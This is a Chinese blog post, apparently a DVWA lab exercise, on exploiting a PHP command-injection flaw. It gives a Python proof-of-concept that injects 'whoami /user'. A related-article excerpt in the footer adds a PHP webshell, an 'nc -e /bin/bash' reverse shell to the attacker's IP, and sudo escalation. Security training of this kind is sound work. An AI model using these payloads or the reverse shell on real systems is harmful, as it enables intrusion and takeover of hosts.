python DVWA命令注入POC练习

最新推荐文章于 2024-03-25 08:00:00 发布
最新推荐文章于 2024-03-25 08:00:00 发布
阅读量259 收藏
点赞数
文章标签: python 开发语言
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_56537388/article/details/132794625
版权

这里同样是抓包,访问DVWA低难度的命令注入


<?php

if( isset( $_POST[ 'Submit' ]  ) ) {
    // Get input
    $target = $_REQUEST[ 'ip' ];

    // Determine OS and execute the ping command.
    if( stristr( php_uname( 's' ), 'Windows NT' ) ) {
        // Windows
        $cmd = shell_exec( 'ping  ' . $target );
    }
    else {
        // *nix
        $cmd = shell_exec( 'ping  -c 4 ' . $target );
    }

    // Feedback for the end user
    echo "<pre>{$cmd}</pre>";
}

?>

源码如上,可以看到对输入没有进行任何过滤,而且将结果输出到界面中

使用payload  127.0.0.1&whoami /user,可以看到SID这个特定值,后面可以根据SID来判断漏洞

 抓包进行分析,根据数据包构建POC

POST /dv/vulnerabilities/exec/ HTTP/1.1

Host: 10.9.75.161

Content-Length: 43

Cache-Control: max-age=0

Upgrade-Insecure-Requests: 1

Origin: http://10.9.75.161

Content-Type: application/x-www-form-urlencoded

User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.5359.125 Safari/537.36

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9

Referer: http://10.9.75.161/dv/vulnerabilities/exec/

Accept-Encoding: gzip, deflate

Accept-Language: en-US,en;q=0.9

Cookie: security=low; BkGOp9578O_think_template=default; PHPSESSID=c1f788dc603a85146269756a943ab0c3

Connection: close



ip=127.0.0.1%26whoami+%2Fuser&Submit=Submit

构建target 

POST /dv/vulnerabilities/exec/ HTTP/1.1
target=url+"/dv/vulnerabilities/exec/"

构造headers

Host: 10.9.75.161

Content-Length: 43

Cache-Control: max-age=0

Upgrade-Insecure-Requests: 1

Origin: http://10.9.75.161

Content-Type: application/x-www-form-urlencoded

User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.5359.125 Safari/537.36

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9

Referer: http://10.9.75.161/dv/vulnerabilities/exec/

Accept-Encoding: gzip, deflate

Accept-Language: en-US,en;q=0.9

Cookie: security=low; BkGOp9578O_think_template=default; PHPSESSID=c1f788dc603a85146269756a943ab0c3

Connection: close
headers={
            "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.5359.125 Safari/537.36",
            "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9",
            "Cookie": "security=low; BkGOp9578O_think_template=default; PHPSESSID=c1f788dc603a85146269756a943ab0c3"
        }

构建data

ip=127.0.0.1%26whoami+%2Fuser&Submit=Submit
data={
            "ip":"127.0.0.1&whoami /user",
            "Submit":"Submit"
        }

构建最终POC

import requests

def command(url):
    try:
        target=url+"/dv/vulnerabilities/exec/"
        headers={
            "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.5359.125 Safari/537.36",
            "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9",
            "Cookie": "security=low; BkGOp9578O_think_template=default; PHPSESSID=c1f788dc603a85146269756a943ab0c3"
        }
        data={
            "ip":"127.0.0.1&whoami /user",
            "Submit":"Submit"
        }
        res=requests.post(target,headers=headers,data=data)
        print(res.text)
        if "SID" in res.text:
            print("[+]",url,"存在命令注入漏洞")
        else:
            print("[-]",url,"未找到命令注入漏洞")
    except Exception as e:
        print("Error")
        print(e)
if __name__ == '__main__':
    url=input('请输入要检测的url:')
    command('http://'+url)

验证结果

blackK_YC
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
POCsuite与goland实现华为HG532路由器命令注入CVE-2017-17215 POC
afei001
11-02 764
POCsuite与goland实现华为HG532路由器命令注入CVE-2017-17215 POC
wed安全攻防
Yang____xiao的博客
04-07 2435
第五章 Metasploit 一,Metasploit简介 本章中示例以Kali操作系统为基础,该操作系统预装Metasploit及在其上运行工具的第三方工具。Kali系统的下载地址为http://www.kali.org/downloads/。 Metasploit框架( Metasploit Framework,MsF)旨在方便渗透测试,具有很好的扩展性,便于渗透测试人员开发使用定制的工具模板。 Metasploit可向后端模块提供多种用来控制测试的接口(如控制台、Web、CLD)。Metas
Command Injection Poc(命令注入)
Websec
03-04 1484
原文:https://medium.com/bugbountywriteup/command-injection-poc-72cc3743f10d 作者: NoGe 漏洞类型:命令注入 ....... 在我测试一个招聘网站的时候,非常有趣的事情是,我发现一个文件名参数可以进行注入 下面是整个漏洞复测流程: 1、首先在这个name参数处输入''sleep 5' ,发现这个响应包延迟...
【高危】Apache Spark UI shell 命令注入漏洞(POC
murphysec的博客
05-16 952
墨菲安全是一家为您提供专业的软件供应链安全管理的科技公司,核心团队来自百度、华为、乌云等企业,公司为客户提供完整的软件供应链安全管理平台,围绕SBOM提供软件全生命周期的安全管理,平台能力包括软件成分分析、源安全管理、容器镜像检测、漏洞情报预警及商业软件供应链准入评估等多个产品。该漏洞是针对此前CVE-2022-33891漏洞的修订,原有漏洞通告中认为3.1.3版本已修复该漏洞,后发现仍受到影响,3.1.3版本已不再维护,官方建议升级至3.4.0版本。该漏洞已存在 POC
命令注入
weixin_44749329的博客
07-23 286
PHP脚本中,我们可以对输入进行注入攻击。什么是注入攻击呢?注入即是通过利用无验证变量构造特殊语句对服务器进行攻击渗透 注入的种类有很多,而不仅仅只是SQL Injection。 PHP注入漏洞有: 命令注入(Command Injection) Eval注入(Eval Insertion) 客户端脚本攻击(Script Insertion) 跨网站脚本攻击(Cross SiteScripti...
#笔记(十四)#命令注入小结
vircorns的博客
02-16 229
输入验证和输出显示 命令注入 连接符 command1 &amp;amp;amp;&amp;amp;amp; command2 (先执行command1后执行command2) command1 | command2 (只执行command2) command1 &amp;amp;amp; command2 (先执行command2后执行command1 ) 常用命令 ipconfig 查看本地网络 net u...
web安全攻防渗透+赵雨佳43
ABCD_6的博客
04-07 4890
第二章 2.1 在Linux系统中安装LANMP LANMP是Linux下Apache、Nginx、MySQL和PHP的应用环境,本节演示的是WDLinux的一款集成的安装包。 2.3 搭建DVWA漏洞环境 DVWA是一款开源的渗透测试漏洞练习平台,其中内涵XSS、SQL注入、文件上传、文件包含、CSRF和暴力破解等各个难度的测试环境。 2.4 搭建SQL注入平台 sqli-labs是一款学习SQL注入的开源平台,共有75种不同类型的注入,在本书的同步网站下载完压缩包后并解压,复..
[红日安全]Web安全Day12 - 会话安全实战攻防
hongrisec的博客
03-07 606
本文由红日安全成员: ruanruan 编写,如有不当,还望斧正。 大家好,我们是红日安全-Web安全攻防小组。此项目是关于Web安全的系列文章分享,还包含一个HTB靶场供大家练习,我们给这个项目起了一个名字叫 Web安全实战 ,希望对想要学习Web安全的朋友们有所帮助。每一篇文章都是于基于漏洞简介-漏洞原理-漏洞危害-测试方法(手工测试,工具测试)-靶场测试(分为PHP靶场、JAVA靶场、Pyt...
项目实习(五)网络渗透实验
eck_777的博客
09-26 7062
这是大学期间进行的生产实习内容,主要是进行一次简单的网络渗透测试。 实习的目的及任务 实习的目的 生产实习是实现理论知识和实践相结合的重要环节。通过实习,学生将对于课堂学习的基础和专业理论知识有更深入的掌握。特别是对信息安全技术与工程的最新发展和应用有较深入的了解。同时通过生产实习,进一步锻炼学生理论与实践相结合的能力,提高学习的主动性,为毕业后的社会工作打下良好的基础。 实习任务要求 (1)严...
Web安全攻防
S1942177831的博客
04-07 3325
DVWA(七) - 使用python脚本实现SQL盲注
qq_42785117的博客
09-02 3302
SQL Injection (Blind) sql盲注其实就是sql注入的一种,但是不会根据sql注入的攻击语句返回你想要知道的信息. 盲注分为两种: 布尔盲注以及时间盲注 布尔盲注: 根据你的注入信息返回True和Fales,而返回的True和Fales可能有不同的表现形式,根据不同的网页分析. 时间盲注: 当界面的返回值只有一种true的时候,就需要加入特定的时间函数,通过判断加载web...
使用Python脚本学习DVWA-SQL Injection(SQL注入
weixin_43838889的博客
04-24 1512
使用Python脚本学习DVWASQL Injection(SQL注入)Low SQL Injection(SQL注入) 本文全程参考[https://blog.csdn.net/zy15667076526/article/details/109705286?utm_medium=distribute.pc_relevant.none-task-blog-baidujs_baidulandingword-0]向该博主致谢 SQL Injection(SQL注入) SQL Injection,即SQL注入
sql注入pythonpoc_DVWA SQL-injection 附python脚本
weixin_39896256的博客
12-17 390
SQL-Injectionlow等级首先我们将dvwa等级调到low 如图接下来选择SQL Injection,并在提交框中输入正常值1,查看返回结果接下来检测是否存在注入,分别输入 1' and 1=1 1' and 1=2 当我们输入1' and 1=1时,发现报错页面,提示我们语句没有闭合,所以我们输入1' and '1'='1和 1' and '1'='2得到如上回显信息说明存在注入...
DVWA布尔盲注Low级Python脚本
m0_74485250的博客
02-21 2189
【代码】DVWA布尔盲注Low级Python脚本
python编写DVWA_SQL injection POC脚本
weixin_44248977的博客
10-04 213
是对DVWA_SQLinjection关卡的python编写的SQL验证POC,输入字典,url,和正确的参数就能试验批量验证
DVWA学习之Command Injection命令注入python脚本实现
qq_31426383的博客
12-01 305
DVWA学习之Command Injection命令注入概述 概述 搭建方法请转至 DVMA学习之安装、环境搭建等。 Brute Force请转至 DVWA学习之Brute Force暴力破解(python脚本实现) 本部分先张贴别人的博客(仅讲解,无脚本实现),后续再贴自己写的 python 脚本。 https://www.cnblogs.com/jojo-feed/p/10172770.html ...
失效的访问控制及漏洞复现
weixin_58954236的博客
09-04 1006
Redis是非关系型数据库系统,没有库表列的逻辑结构,仅仅以键值对的方式存储数据。Redis数据库经常用于Web应用的缓存。Redis可以与文件系统进行交互。Redis监听TCP/6379Redis数据库端口号:6379。
学习Python渗透第十二天:用Python实现暴力破解
最新发布
2203_75839317的博客
03-25 1277
接下来,我们来编写一个可以实现登录功能的Python程序,这里需要用到requests库,这是一个专门用来处理HTTP的库,利用这个库发起请求十分简单,例如我们需要发送POST请求,需要用到requests.post()函数,这个函数比较复杂,常用格式如下。
常见操作系统命令注入思路
牛叫兽的测试学习和分享
12-16 6389
渗透测试技能:命令注入思路总结
dvwa命令注入提权
12-05
根据提供的引用内容,dvwa命令注入提权的思路如下: 1.尝试写入一个php文件,可以使用如下命令: ``` echo '<?php system($_GET["cmd"]); ?>' > /var/www/html/cmd.php ``` 这个命令会在/var/www/html/目录下写入一个名为cmd.php的文件,其中的system($_GET["cmd"])可以执行GET请求中的cmd参数所对应的命令。 2.连接菜刀,使用如下命令: ``` nc -nvlp 4444 ``` 这个命令会在本地监听4444端口,等待菜刀连接。 3.在DVWA命令注入页面中,输入如下命令: ``` & cmd=nc -e /bin/bash 你的IP地址 4444 & ``` 其中,你的IP地址需要替换成你本地的IP地址。这个命令会在目标机器上执行nc命令,将shell连接回你的本地机器。 4.在菜刀中连接目标机器,即可获得一个shell,使用whoami命令查看当前用户,如果是www-data,则可以使用如下命令提权: ``` sudo -l ``` 这个命令会列出当前用户可以使用sudo命令执行的命令。 5.如果当前用户可以使用sudo执行任意命令,则可以使用如下命令提权: ``` sudo /bin/bash ``` 这个命令会以root权限打开一个新的shell。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值